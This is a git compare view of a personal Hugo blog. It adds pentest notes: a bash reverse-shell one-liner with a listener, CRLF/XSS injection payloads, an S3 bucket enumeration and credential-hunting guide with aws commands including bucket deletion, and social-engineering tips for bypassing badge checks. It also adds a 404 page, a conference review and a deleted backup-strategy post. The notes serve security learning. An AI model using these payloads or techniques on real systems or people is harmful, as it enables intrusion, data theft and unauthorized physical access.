Compare commits

6 Commits

9819b7bd59

...

07f3dc9943

| Author | SHA1 | Date |
|---|---|---|
| | 07f3dc9943 | |
| | e27bbe3424 | |
| | 8f7f88c297 | |
| | f0d74bda0e | |
| | 321024f22f | |
| | 788c612018 | |

9

content/hacking/HowTo_Bash_reverseShell.md

Normal file


@ -0,0 +1,9 @@

|

||||

+++

|

||||

title = 'HowTo Bash ReverseShell'

|

||||

date = 2024-09-11

|

||||

+++

|

||||

|

||||

Listener - `nc -l 8081`

|

||||

Reverse shell - `bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1`

|

||||

|

||||

May not work on hardened systems/containers.

|

||||

26

content/hacking/HowTo_CRLF.md

Normal file


@ -0,0 +1,26 @@

|

||||

+++

|

||||

title = 'HowTo CRLF'

|

||||

date = 2024-09-25

|

||||

+++

|

||||

|

||||

|

||||

Mostly fixed these days! It may still occur in some handwritten web servers<!--more-->

|

||||

|

||||

CRLF - Carriage Return (\r) + Line Feed (\n) (URL-encoded as %0d%0a)

|

||||

|

||||

|

||||

|

||||

Inserting \r\n into a URL allows an attacker to perform:

|

||||

- log splitting - inserting fake log entries on the server that may deceive an administrator

|

||||

- HTTP response splitting - allows adding HTTP headers to the HTTP response <!-- TODO how does it work? -->

|

||||

- XSS - `www.target.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E` - disables XSS protection, sets a custom Location (but does it work without a 302/201 status???), sets the HTML content type and injects JavaScript.

|

||||

- cookie injection

|

||||

- check another note

|

||||

|

||||

For example:

|

||||

`GET /%0d%0aSet-Cookie:CRLFInjection=PreritPathak HTTP/1.1`

|

||||

This adds a `Set-Cookie:CRLFInjection=PreritPathak` header to the HTTP response if the server reflects the request path into a response header without sanitizing it.
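On the defensive side, the usual fix is to reject CR and LF before user input reaches a response header. Below is a minimal sketch of that check, assuming a hypothetical helper named `safe_header_value` (it is not part of any framework; most modern frameworks already do this for you):

```python
from urllib.parse import unquote


def safe_header_value(raw: str) -> str:
    """Return the URL-decoded value, or raise if it contains CR or LF.

    Hypothetical helper, for illustration only.
    """
    decoded = unquote(raw)  # turns %0d%0a into "\r\n"
    if "\r" in decoded or "\n" in decoded:
        raise ValueError("CR/LF in header value: possible CRLF injection")
    return decoded


if __name__ == "__main__":
    print(safe_header_value("/home"))
    try:
        safe_header_value("/%0d%0aSet-Cookie:CRLFInjection=PreritPathak")
    except ValueError as err:
        print("rejected:", err)
```

Rejecting the request outright is usually safer than trying to strip the characters, because stripping can be bypassed with double encoding.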

|

||||

|

||||

{{< source >}}

|

||||

https://www.geeksforgeeks.org/crlf-injection-attack/

|

||||

{{< /source >}}

|

||||

150

content/hacking/HowTo_S3.md

Normal file


@ -0,0 +1,150 @@

|

||||

+++

|

||||

title = 'HowTo Hack S3'

|

||||

date = 2024-09-04

|

||||

+++

|

||||

|

||||

|

||||

## What is S3?

|

||||

|

||||

### Abstract

|

||||

|

||||

S3 (Amazon Simple Storage Service) is object storage. You can think of it as cloud storage designed for **storing and retrieving large files**, e.g. backups, archives, big data analytics, content distribution, and static website content.

|

||||

|

||||

S3-compatible storage can be self-hosted (but you probably shouldn't do it). Otherwise, a company will probably use Amazon's S3 or an S3-compatible service from one of these providers:

|

||||

- DigitalOcean

|

||||

- DreamHost

|

||||

- GCP

|

||||

- Linode

|

||||

- Scaleway

|

||||

|

||||

S3 has "buckets" - containers (think folders) for files.

|

||||

|

||||

### Technical

|

||||

|

||||

Interaction with S3 happens via a RESTful API (e.g. through `awscli`).

|

||||

|

||||

Each bucket has its own settings:

|

||||

- Region - each bucket is created in a specific AWS region (for performance),

|

||||

e.g. `https://<bucket-name>.s3.<region>.amazonaws.com/image.png`

|

||||

or path-style (deprecated) `https://s3.<region>.amazonaws.com/<bucket-name>/`

|

||||

or "dual-stack" (reachable over both IPv4 and IPv6):

|

||||

`bucketname.s3.dualstack.aws-region.amazonaws.com`

|

||||

`s3.dualstack.aws-region.amazonaws.com/bucketname`

|

||||

- Name - each bucket name must be unique across all AWS regions

|

||||

- Versioning - S3 can keep snapshots of data

|

||||

- Logging/monitoring - disabled by default

|

||||

- Access control - the most interesting part for us. S3 has **public** and **private** buckets:

|

||||

- In a public (or open) bucket, any user can list the contents

|

||||

- In a private bucket, you need credentials that have access to the specific file

|

||||

<!-- - Storage class - how fast data can be accessed -->

|

||||

<!-- - Lifecycle management - data can automatically be deleted or transfered to cheaper storage -->
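To make the endpoint formats above concrete, here is a small sketch that splits an S3 URL into bucket, region and addressing style. The function name `parse_s3_url` and the regular expressions are my own assumptions for illustration; they only cover the virtual-hosted, path-style and dual-stack forms listed above (plus the region-less `bucket.s3.amazonaws.com` host), not every historical variant:

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# <bucket>.s3.[dualstack.][<region>.]amazonaws.com
_VHOST = re.compile(
    r"^(?P<bucket>[a-z0-9][a-z0-9.-]+)\.s3\.(?:dualstack\.)?"
    r"(?:(?P<region>[a-z0-9-]+)\.)?amazonaws\.com$"
)
# s3.[dualstack.][<region>.]amazonaws.com/<bucket>
_PATH = re.compile(
    r"^s3\.(?:dualstack\.)?(?:(?P<region>[a-z0-9-]+)\.)?amazonaws\.com$"
)


def parse_s3_url(url: str) -> Optional[dict]:
    """Return bucket/region/style for a recognised S3 URL, else None."""
    parts = urlsplit(url if "://" in url else "https://" + url)
    host = (parts.hostname or "").lower()

    match = _VHOST.match(host)
    if match:
        return {"bucket": match["bucket"], "region": match["region"],
                "style": "virtual-hosted"}

    match = _PATH.match(host)
    if match:
        # In path style the bucket is the first path segment.
        bucket = parts.path.lstrip("/").split("/", 1)[0]
        if bucket:
            return {"bucket": bucket, "region": match["region"],
                    "style": "path"}
    return None


if __name__ == "__main__":
    print(parse_s3_url("https://my-bucket.s3.eu-west-1.amazonaws.com/image.png"))
    print(parse_s3_url("s3.dualstack.us-west-2.amazonaws.com/bucketname"))
```

`region` comes back as `None` when the hostname does not carry one.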

|

||||

|

||||

## Recon

|

||||

|

||||

### Find bucket endpoint

|

||||

|

||||

<!-- 1. Try [Wappalyzer](https://www.wappalyzer.com/apps/) -->

|

||||

1. [Crawl](/hacking/howto_crawl/) site - `katana -js -u SITE`

|

||||

1. Search the crawl results for `.*s3.*amazonaws\.com`

|

||||

1. Check the CNAME records of domains from the crawl results, e.g. `resources.domain.com -> bucket.s3.amazonaws.com`

|

||||

1. Check [list of discovered buckets](https://buckets.grayhatwarfare.com), it may have your bucket.

|

||||

1. [Bruteforce bucket name](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum#brute-force) by [creating a custom wordlist](/hacking/howto_customize_wordlist/) per domain
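The "search in crawl results" step can be sketched as a small filter over saved crawler output. This is only an illustration: the function name `find_s3_hosts` and the regular expression are assumptions of mine, and the pattern is intentionally loose, so expect some false positives:

```python
import re

# Any hostname that contains "s3" and ends in amazonaws.com
S3_HOST = re.compile(r"[a-z0-9.-]*s3[a-z0-9.-]*\.amazonaws\.com", re.IGNORECASE)


def find_s3_hosts(crawl_output: str) -> list:
    """Return the unique S3-looking hostnames found in the text, sorted."""
    return sorted({m.group(0).lower() for m in S3_HOST.finditer(crawl_output)})


if __name__ == "__main__":
    sample = (
        "https://example.com/a.js\n"
        "https://assets.s3.eu-west-1.amazonaws.com/app.js\n"
        "<img src='https://s3.amazonaws.com/media/x.png'>\n"
    )
    for host in find_s3_hosts(sample):
        print(host)
```

Path-style hits such as `s3.amazonaws.com/media/...` only give you the endpoint, so the bucket name still has to be read from the first path segment of the original URL.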

|

||||

|

||||

|

||||

### Find credentials

|

||||

|

||||

We will try to find S3 bucket credentials with OSINT.

|

||||

|

||||

1. Use Google Dorks

|

||||

1. Check the company's public git repos

|

||||

1. Check employees' git repos

|

||||

|

||||

If you have access to Google Custom Search Engine:

|

||||

- https://github.com/carlospolop/gorks

|

||||

- https://github.com/carlospolop/pastos

|

||||

|

||||

and check https://github.com/carlospolop/leakos

|

||||

|

||||

## Enumerate

|

||||

|

||||

### Automatically

|

||||

|

||||

Find public buckets in bucket list (or bruteforce bucket name): [S3Scanner](https://github.com/sa7mon/S3Scanner)

|

||||

Search for secrets in public bucket: [BucketLoot](https://github.com/redhuntlabs/BucketLoot)

|

||||

|

||||

### Manually connect to S3

|

||||

|

||||

To check whether a bucket is public, you can just open the bucket link in a browser: a public bucket lists its first 1000 objects, otherwise you get an "AccessDenied" error.
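What the browser shows is plain XML, so the check is easy to script. The sketch below only classifies a response body you have already fetched (no network calls); `classify_bucket_response` is a hypothetical helper name, and the sample bodies in the demo are shortened, hand-written approximations of real S3 responses:

```python
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Strip an XML namespace such as '{http://...}Name' down to 'Name'."""
    return tag.rsplit("}", 1)[-1]


def classify_bucket_response(body: str) -> str:
    """Return 'public-listing', the S3 error code, or 'unknown'."""
    root = ET.fromstring(body)
    name = _local(root.tag)
    if name == "ListBucketResult":
        return "public-listing"
    if name == "Error":
        for child in root:
            if _local(child.tag) == "Code":
                return child.text or "Error"
        return "Error"
    return "unknown"


if __name__ == "__main__":
    listing = (
        '<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
        "<Name>demo</Name><IsTruncated>false</IsTruncated></ListBucketResult>"
    )
    denied = "<Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>"
    print(classify_bucket_response(listing))
    print(classify_bucket_response(denied))
```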

|

||||

|

||||

awscli:

|

||||

- `aws configure` - write credentials if you have them

|

||||

otherwise try with any [valid AWS account](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#cross-account-attacks) that has no access to the target

|

||||

|

||||

- list S3 buckets associated with a profile

|

||||

`aws s3 ls`

|

||||

`aws s3api list-buckets`

|

||||

`aws --endpoint-url=http://s3.customDomain.com s3 ls` - to use a custom domain

|

||||

|

||||

- list files - `aws s3 ls s3://bucket`

|

||||

`--recursive` - list recursively

|

||||

`--no-sign-request` - send an unsigned (anonymous) request to check 'Everyone' permissions

|

||||

`--endpoint-url` - use a custom S3 domain

|

||||

Additionally:

|

||||

```

|

||||

# list content of bucket (with creds)

|

||||

aws s3 ls s3://bucket-name

|

||||

aws s3api list-objects-v2 --bucket <bucket-name>

|

||||

aws s3api list-objects --bucket <bucket-name>

|

||||

aws s3api list-object-versions --bucket <bucket-name>

|

||||

```

|

||||

- upload - `aws s3 cp smth s3://smth`

|

||||

|

||||

- download - `aws s3 cp s3://bucket/secret.txt .`

|

||||

- download whole bucket - `aws s3 sync s3://<bucket>/ .`

|

||||

- delete the bucket - `aws s3 rb s3://bucket-name --force` (`--force` first deletes all objects in it)

|

||||

|

||||

|

||||

### Gather info on bucket

|

||||

|

||||

|

||||

- Get bucket and object ACLs:

|

||||

```

|

||||

aws s3api get-bucket-acl --bucket <bucket-name>

|

||||

aws s3api get-object-acl --bucket <bucket-name> --key flag

|

||||

```

|

||||

- Get policy:

|

||||

```

|

||||

aws s3api get-bucket-policy --bucket <bucket-name>

|

||||

aws s3api get-bucket-policy-status --bucket <bucket-name> # shows whether the bucket is public

|

||||

|

||||

```

|

||||

|

||||

|

||||

|

||||

[Additional actions to buckets.](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum#enumeration)

|

||||

|

||||

## Additional resources

|

||||

|

||||

- [S3 may have additional services that may be vulnerable](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access#aws-unauthenticated-enum-and-access)

|

||||

- [S3 privesc](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc)

|

||||

- [S3 HTTP Cache Poisoning Issue](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum#heading-s3-http-desync-cache-poisoning-issue)

|

||||

- [Check whether an email has a registered AWS account](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum#used-emails-as-root-account-enumeration)

|

||||

- [Get Account ID from public Bucket](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum#get-account-id-from-public-bucket)

|

||||

- [Confirming a bucket belongs to an AWS account](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum#confirming-a-bucket-belongs-to-an-aws-account)

|

||||

- [How to maintain persistence in S3](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence)

|

||||

|

||||

|

||||

## Train

|

||||

|

||||

- http://flaws.cloud/

|

||||

|

||||

- http://flaws2.cloud/

|

||||

|

||||

{{< source >}}

|

||||

https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology#looking-for-vulnerabilities-2

|

||||

https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence

|

||||

https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum

|

||||

https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access

|

||||

https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum

|

||||

https://freedium.cfd/https//medium.com/m/global-identity-2?redirectUrl=https%3A%2F%2Finfosecwriteups.com%2Ffinding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4

|

||||

{{< /source >}}

|

||||

32

content/hacking/HowTo_learn_SocialEngineering.md

Normal file


@ -0,0 +1,32 @@

|

||||

+++

|

||||

title = 'HowTo learn Social Engineering'

|

||||

date = 2024-09-18

|

||||

+++

|

||||

|

||||

<!-- TODO xkcd meme -->

|

||||

|

||||

Social Engineering - it's **Social** skills + Events **Engineering**<!--more-->

|

||||

|

||||

How to learn Social Engineering:

|

||||

- Create new __Identity__ - "Today I will be Jack the electrician"

|

||||

- Just start interacting with **all** kinds of people

|

||||

- Don't open with the same routine ("Hello, I'm Jack, who are you?"); do it differently every time

|

||||

- Go pick up girls ~~and touch grass~~

|

||||

- Especially speak with people you are uncomfortable with

|

||||

- You need uncomfortable situations to learn how to handle yourself under stress

|

||||

- If they invite you to something weird that you usually don't want to do - Do it

|

||||

- If you have to present something as proof that you belong in a place where you shouldn't be - Don't show it.

|

||||

|

||||

|

||||

Make your office a penetration testing lab

|

||||

- Is a badge required? - Do not wear it and make up an excuse. Talk your way out

|

||||

|

||||

|

||||

Books for Social skill:

|

||||

- "Built for Growth" - Chris Kuenne

|

||||

- "The Coaching Habit" - Michael Bungay Stanier

|

||||

|

||||

|

||||

{{< source >}}

|

||||

https://www.youtube.com/watch?v=CldNso156QY

|

||||

{{< /source >}}

|

||||

23

content/hidden/404.md

Normal file


@ -0,0 +1,23 @@

|

||||

---

|

||||

title: "[Error 404](/)"

|

||||

hidden: true

|

||||

noindex: true

|

||||

layout: page

|

||||

---

|

||||

|

||||

Hi! Sorry but link doesn't exist yet.

|

||||

|

||||

|

||||

|

||||

<!-- TODO download, upscale, host here - https://tenor.com/view/cat-loading-error-gif-19814836-->

|

||||

|

||||

It may be still in work or not posted yet.

|

||||

|

||||

If this link doesn't work for 1+ weeks, please contact me!

|

||||

|

||||

<!-- -->

|

||||

<!-- -->

|

||||

<!-- -->

|

||||

<!-- [Take me home!](/) -->

|

||||

|

||||

<!-- thanks https://moonbooth.com/hugo/custom-404/ for guide -->

|

||||

@ -1,10 +0,0 @@

|

||||

---

|

||||

title: "I forgot to make post"

|

||||

hidden: true

|

||||

---

|

||||

|

||||

Hi! Sorry but link doesn't exist yet.

|

||||

|

||||

It may be still in work or not posted yet.

|

||||

|

||||

If this link doesn't work for 1+ weeks, please contact me!

|

||||

@ -1,230 +0,0 @@

|

||||

+++

|

||||

title = 'test'

|

||||

hidden = true

|

||||

image = "https://i.extremetech.com/imagery/content-types/017c7K9UIE7N2VnHK8XqLds/images-5.jpg"

|

||||

+++

|

||||

|

||||

|

||||



<meta property="og:image" content="https://imgs.xkcd.com/comics/backup_batteries.png" />

|

||||

|

||||

|

||||

In short: 3-2-1 backup strategy + Disaster recovery plan.

|

||||

|

||||

|

||||

|

||||

## Backup strategy

|

||||

|

||||

You should have:

|

||||

- 3 copies of data

|

||||

- on 2 different types of storage

|

||||

- including 1 off-site copy

|

||||

|

||||

AND you must test your disaster recovery plan
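As a quick sanity check, the rule can be written down as a few lines of code. This is only a sketch under my own assumptions: the `Copy` record, its field names and the media labels are made up for illustration:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Copy:
    name: str
    media: str      # storage type, e.g. "internal-hdd", "external-hdd", "cloud"
    offsite: bool   # True if the copy lives outside the main site


def satisfies_3_2_1(copies: list) -> bool:
    """3 copies, on at least 2 storage types, with at least 1 off-site."""
    enough_copies = len(copies) >= 3
    enough_media = len({c.media for c in copies}) >= 2
    has_offsite = any(c.offsite for c in copies)
    return enough_copies and enough_media and has_offsite


if __name__ == "__main__":
    plan = [
        Copy("original", "internal-hdd", offsite=False),
        Copy("local backup", "external-hdd", offsite=False),
        Copy("encrypted cloud backup", "cloud", offsite=True),
    ]
    print(satisfies_3_2_1(plan))
```

Note that the check says nothing about whether the backups can actually be restored; that is what the disaster recovery test is for.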

|

||||

|

||||

### Why so many copies?

|

||||

|

||||

What if you accidentally delete important files that you frequently edit? That's the reason to have snapshots.

|

||||

|

||||

What if your main data drive dies? That's the reason to have a backup nearby.

|

||||

|

||||

You think you're smart and have RAID for all those cases? Did you know that in drive arrays, one drive's failure significantly increases the short-term risk of a second drive failing? That's the reason to have an off-site backup.

|

||||

|

||||

What if your main storage server dies along with all the drives in it due to a power spike (flood, etc.)? So, do off-site backups.

|

||||

|

||||

|

||||

|

||||

### 3 copies of data

|

||||

|

||||

You should have:

|

||||

- Original data

|

||||

- 1 on-site backup (another drive)

|

||||

- 1 backup in another place (encrypted in cloud, HDD stored in another remote location (friend's house))

|

||||

|

||||

Backups should be made regularly (daily, or more frequently for critical data; it also depends on how "hot" the data is, i.e. how fast it changes).

|

||||

My take on it: have a trusted source of data (RAID/Ceph) and use snapshots as the on-site copy of the data to save some money on backup drives.

|

||||

|

||||

### 2 types of storage

|

||||

|

||||

You need 2 different types of storage to mitigate errors that may affect all devices of 1 type.

|

||||

|

||||

Storage types examples:

|

||||

- Internal HDD/SSD (we will focus on them)

|

||||

- External HDD (them)

|

||||

- USB drive/SSD

|

||||

- Tape library

|

||||

- Cloud storage (and them)

|

||||

|

||||

### 1 off-site copy

|

||||

|

||||

It's pretty simple:

|

||||

- encrypted cloud backup

|

||||

- encrypted HDD with backup in another town in friend's house (secured by bubble wrap)

|

||||

- or at least encrypted HDD in another house (also secured by bubble wrap)

|

||||

|

||||

The more distant this off-site backup the better.

|

||||

|

||||

|

||||

## Disaster recovery plan

|

||||

|

||||

People fall into 3 categories:

|

||||

- those who don't do backups yet

|

||||

- those who already do them

|

||||

- and those who do them and tested them

|

||||

|

||||

You should be in the 3rd category.

|

||||

|

||||

__So what is disaster recovery plan?__

|

||||

|

||||

You must be prepared in case your main data and on-site backup die. You must simulate beforehand:

|

||||

- accidental data removal (to test on-site snapshots)

|

||||

- drive failure and its change (to test RAID/Ceph solution)

|

||||

- main storage failure (to test restoring from the on-site backup)

|

||||

- entire site unavailability (to test off-site backup)

|

||||

|

||||

Ideally, you should write yourself a step-by-step guide on what to do in each of those situations.
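One way to make a restore test objective is to compare checksums of the original tree and the restored tree. The sketch below assumes both are available as local directories; the function names `tree_digest` and `restore_matches` are mine, and it reads every file fully into memory, so it is meant for test datasets rather than terabytes:

```python
import hashlib
from pathlib import Path


def tree_digest(root: Path) -> dict:
    """Map each file's relative path to the SHA-256 of its contents."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def restore_matches(source: Path, restored: Path) -> bool:
    """True if both trees contain the same files with identical contents."""
    return tree_digest(source) == tree_digest(restored)


if __name__ == "__main__":
    import sys

    ok = restore_matches(Path(sys.argv[1]), Path(sys.argv[2]))
    print("restore OK" if ok else "restore DIFFERS")
```

Run it with the source directory and the restored directory as the two arguments after each simulated failure.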

|

||||

|

||||

|

||||

|

||||

{{< spoiler Examples >}}

|

||||

|

||||

|

||||

|

||||

## Examples

|

||||

|

||||

|

||||

|

||||

### Enterprise-ish (Expensive at start, hard setup, easy to maintain)

|

||||

|

||||

Ceph cluster:

|

||||

- requires 3 servers (at least) (OS - Proxmox)

|

||||

Ideally server motherboard, ECC RAM, Intel Xeon E5 v4 CPU Family or better / AMD Epyc analog

|

||||

- any number of drives (but at least 3 drives)

|

||||

Ideally enterprise-class (or with "RAID support"). The more IOPS - the better

|

||||

- [automatic snapshots](https://github.com/draga79/cephfs-snp)

|

||||

- 10Gb network (if you expect total 9-ish (or more) HDD drives or some SSDs)

|

||||

- Setup Samba/WebDAV/Nextcloud server which will share this storage to your network

|

||||

- and ideally an SSD cache (at least 2 SSDs with PLP; 1 TB each is more than enough for 10 TB of raw storage)

|

||||

|

||||

Off-site backup:

|

||||

|

||||

Cloud storage + [Duplicati](https://github.com/duplicati/duplicati)

|

||||

OR

|

||||

Proxmox Backup Server in another city (e.g. at a friend's house) with RAID1/5/6

|

||||

(though you should set it up so that if malware or a hacker gets root access, it can't overwrite the backups)

|

||||

|

||||

#### Pros

|

||||

- Ideal if you already have homeserver and want to expand

|

||||

- Low chance of losing data because you essentially have 3 copies (by default, 2 minimum) of data + hourly/daily/weekly/monthly snapshots

|

||||

So if 2 drives die at the same time, you still won't lose your data

|

||||

Essentially it covers 2 copies of data

|

||||

- If a drive fails, you simply take it out, put a new drive in and add it to the pool via the WebGUI

|

||||

- With SSD cache you can throw in any trashy HDD drives until they start to fail

|

||||

- You can add any number of drives

|

||||

- And if you need/want to be able to freely shut down one of the servers and still access data, you need to distribute drives so that raw storage is even across servers.

|

||||

Or just add a few more servers and distribute drives between them so you can still access this storage

|

||||

- If your house and servers get destroyed, you won't lose your data

|

||||

- You can access your storage from any device in your network as if it were on that device

|

||||

|

||||

#### Cons

|

||||

- Expect 30% usable space from raw storage (you can use Erasure Coding (RAID5 analog) but it will be even slower)

|

||||

- Bad/Slow (in terms of IOPS and delay times) drives without PLP SSD cache can have amazingly bad total speed

|

||||

- Power usage might be a burden if you don't already run any servers

|

||||

- More performance comes with more drives, because speed = available IOPS and average access time of the 2-3 drives that hold the data. So the more drives, the more IOPS we have (excluding the SSD cache case)

|

||||

- Ceph can be complicated to understand and maintain in case of failures

|

||||

|

||||

|

||||

### Home-server (Medium cost, medium difficulty, hard to maintain)

|

||||

|

||||

CIFS/WebDAV/Nextcloud Share:

|

||||

- get any PC, install linux on it, setup Samba/WebDAV/Nextcloud share

|

||||

- X number of drives in RAIDZ (4+ equal-sized drives) (ideally RAIDZ2)

|

||||

- ZFS automatic Snapshots

|

||||

|

||||

Off-site backup:

|

||||

Cloud storage + [Duplicati](https://github.com/duplicati/duplicati)

|

||||

OR

|

||||

Regular (monthly/weekly) manual encrypted backup to an external HDD which is given to a friend.

|

||||

|

||||

#### Pros

|

||||

- It's relatively cheap

|

||||

- You get storage space from X-1 (or X-2) of drives

|

||||

- You can access your storage from any device in your network as if it were on that device

|

||||

- You can lose 1 drive (RAIDZ2 - 2 drives)

|

||||

|

||||

#### Cons

|

||||

- If a drive fails, storage will be inaccessible for some time after you replace the failed drive with a new one.

|

||||

- If 2 drives (RAIDZ2 - 3) fail within a short period of time, you lose data

|

||||

- Hard to expand storage, whether by using bigger disks or by adding more disks

|

||||

- Drives should be the same size
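The capacity figures from the two setups above ("expect 30% usable space" for 3-way replication, "X-1 (or X-2)" drives for RAIDZ) come down to simple arithmetic. A rough sketch, ignoring filesystem overhead and reserved space; the function names are my own:

```python
def replicated_usable(raw_tb: float, replicas: int = 3) -> float:
    """Usable space when every object is stored `replicas` times (Ceph-style)."""
    if replicas < 1:
        raise ValueError("replicas must be at least 1")
    return raw_tb / replicas


def raidz_usable(drives: int, drive_tb: float, parity: int = 1) -> float:
    """Usable space of equal-sized drives with `parity` drives' worth of parity.

    parity=1 corresponds to RAIDZ, parity=2 to RAIDZ2.
    """
    if drives <= parity:
        raise ValueError("need more drives than parity drives")
    return (drives - parity) * drive_tb


if __name__ == "__main__":
    print(replicated_usable(30))          # 3 replicas of 30 TB raw
    print(raidz_usable(4, 4, parity=1))   # 4 x 4 TB in RAIDZ
    print(raidz_usable(6, 4, parity=2))   # 6 x 4 TB in RAIDZ2
```

Real-world numbers will be somewhat lower, since both Ceph and ZFS need free headroom to rebalance or resilver.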

|

||||

|

||||

|

||||

|

||||

### Home PC (low cost, low difficulty, easy to maintain)

|

||||

|

||||

We will just put 2 (or more) drives in RAID1 in your PC.

|

||||

Ideally, buy different drives with same-ish specs so they die at different times. And use a file system with snapshot support

|

||||

|

||||

Off-site backup:

|

||||

Cloud storage + [Duplicati](https://github.com/duplicati/duplicati)

|

||||

OR

|

||||

Regular (monthly/weekly) manual encrypted backup to an external HDD which is given to a friend.

|

||||

|

||||

|

||||

#### Pros

|

||||

- It's cheap

|

||||

- Setup easy to understand

|

||||

|

||||

|

||||

#### Cons

|

||||

- 50% space from raw storage

|

||||

- Potentially no snapshots if the file system doesn't support them

|

||||

- All of the drives have to die for you to lose data

|

||||

|

||||

|

||||

|

||||

### Laptop (High cost, easy setup, easy to maintain)

|

||||

|

||||

This time we will do opposite:

|

||||

- laptop with a cloud storage client that keeps files synchronized (so files are stored both on the laptop and in the cloud)

|

||||

- ideally file system snapshot support

|

||||

|

||||

Off-site backup:

|

||||

Regular (monthly/weekly) manual encrypted backup to an external HDD which is given to a friend.

|

||||

|

||||

#### Pros

|

||||

- It's cheap at first, but costly in the long run

|

||||

- It's easy to set up and cloud providers give support (not the best, but nevertheless)

|

||||

- It's much easier to maintain since you don't have to deal with hardware

|

||||

|

||||

#### Cons

|

||||

- It's the least privacy-friendly setup because you will have unencrypted data in the cloud, unless you find a way to sync only encrypted data to the cloud

|

||||

- Cloud subscriptions are costly in the long run

|

||||

- To have backup - you should be connected to internet

|

||||

- You may be affected by the cloud provider's outages and other problems

|

||||

|

||||

|

||||

|

||||

### Laptop+PC (Low cost, easy setup, may be hard to maintain)

|

||||

|

||||

We will use available hardware and its space, laptop+PC+off-site (friend's) PC for encrypted backups.

|

||||

The trick is - we will use [syncthing](https://github.com/syncthing/syncthing) - an amazing tool that allows P2P storage sync.

|

||||

|

||||

#### Pros

|

||||

- P2P, no other servers involved!

|

||||

- We can specify where data will be stored encrypted and where it will be freely accessible

|

||||

- as easy to setup as cloud provider

|

||||

|

||||

#### Cons

|

||||

- An issue may arise if a file is edited in 2 places before a sync = version conflict

|

||||

- Another problem is storage space: it's easy to set up, but it may be hard to maintain if the data drives have different amounts of free space.

|

||||

|

||||

|

||||

|

||||

{{< /spoiler >}}

|

||||

|

||||

{{< source >}}

|

||||

https://raidz-calculator.com/raidz-types-reference.aspx

|

||||

https://www.techtarget.com/searchdatabackup/definition/3-2-1-Backup-Strategy

|

||||

https://en.wikipedia.org/wiki/Hard_disk_drive

|

||||

{{< /source >}}

|

||||

|

||||

26

content/personal/HowIs_OFFZONE_2024.md

Normal file


@ -0,0 +1,26 @@

|

||||

+++

|

||||

title = 'Howis OFFZONE 2024'

|

||||

date = 2024-08-25

|

||||

+++

|

||||

|

||||

Hi, I was at OFFZONE 2024, it was fun. <!--more-->

|

||||

|

||||

Overall, I enjoyed the event, though I had problems with events/contests and my free time:

|

||||

- Too many people, hard to win

|

||||

- Too many contests that you want to get into

|

||||

- Contest tasks take too long to solve to fully participate in at least 3 contests in 2 days. I'm not even talking about getting to the talks.

|

||||

- There is no list of contests in a conveniently readable form, so you have to go around all the stands; I got depressed from not understanding what to spend my attention on.

|

||||

- It is not very intuitive where to go to get to the right event/auditorium (which hits especially hard with a large number of contests)

|

||||

- Little space to sit down with a laptop to take part in the contest

|

||||

- An obvious problem with spending offcoins: everything I wanted to buy was already gone, the queue was long, and it was impossible to buy some things for offcoins on the first day.

|

||||

|

||||

|

||||

My suggestions:

|

||||

- Make the conference a little more local / split it (into several parts, say a contest part and a part purely with talks / workshops and socialization), reduce the number of tickets, OR extend the conference from 2 days to 4, even if there are no additional talks.

|

||||

I can give the past Standoff Talks as an example of a local convention. It was the most comfy conference of my life, especially the first day; it would be cool if there were contests on the second day (because the second day was a little dull).

|

||||

- Limit contests by duration, say to an hour. To calibrate, take 10 random hackers, let them solve the contest, note how much time each one spends, and calculate the average time.

|

||||

- Make a separate web list of activities with their descriptions, filterable by type and by tags (say: complexity, windows/linux/reverse/web/etc, whether you need your own laptop, whether it can be done at the booth) and showing how many offcoins each one is worth

|

||||

|

||||

I didn't like the fact that I wasn't really talkative with strangers, and I need to change that.

|

||||

|

||||

|

||||

@ -6,8 +6,7 @@ baseUrl: "https://blog.ca.sual.in/"

|

||||

title: "Casual Blog"

|

||||

theme: "anubis2"

|

||||

paginate: 10

|

||||

# disqusShortname: "yourdiscussshortname"

|

||||

# googleAnalytics: "G-12345"

|

||||

|

||||

enableRobotsTXT: true

|

||||

|

||||

taxonomies:

|

||||

|

||||

@ -1,8 +1,10 @@

|

||||

+++

|

||||

title = 'HowTo DO SOMETHING'

|

||||

date = 2024-05-03

|

||||

date = 2024-08-03

|

||||

+++

|

||||

|

||||

<!-- -->

|

||||

|

||||

I forgot to write summary<!--more-->

|

||||

|

||||

|

||||

|

||||

@ -1,8 +1,108 @@

|

||||

